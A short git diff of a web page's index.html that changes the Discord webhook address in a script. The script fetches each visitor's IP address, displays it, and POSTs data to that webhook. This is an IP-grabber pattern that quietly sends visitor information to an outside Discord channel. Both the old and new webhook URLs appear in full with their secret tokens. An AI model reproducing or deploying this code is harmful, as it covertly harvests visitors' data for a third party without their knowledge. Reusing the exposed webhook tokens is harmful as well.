--- a/index.html
+++ b/index.html
@@ -234,7 +234,7 @@
                 const data = await response.json();
                 ipDisplay.textContent = `IP Address: ${data.ip}`;
 
-                const webhookUrl = "https://discord.com/api/webhooks/1333014267464519701/yzJYSjkKdmqFtQothDahuIZqhrf-qDNpRZXF7t3og8Ftpc4bvmKzK0kB8p6OrIggPFWS";
+                const webhookUrl = "https://discordapp.com/api/webhooks/1341556613072289822/F6mUhczPiIkO5erN5N_76lI3ypltWFR0KQ5zbG_BxII2KeJmWLl2D1PUeI6iXEEyAFao";
 
                 await fetch(webhookUrl, {
                     method: 'POST',
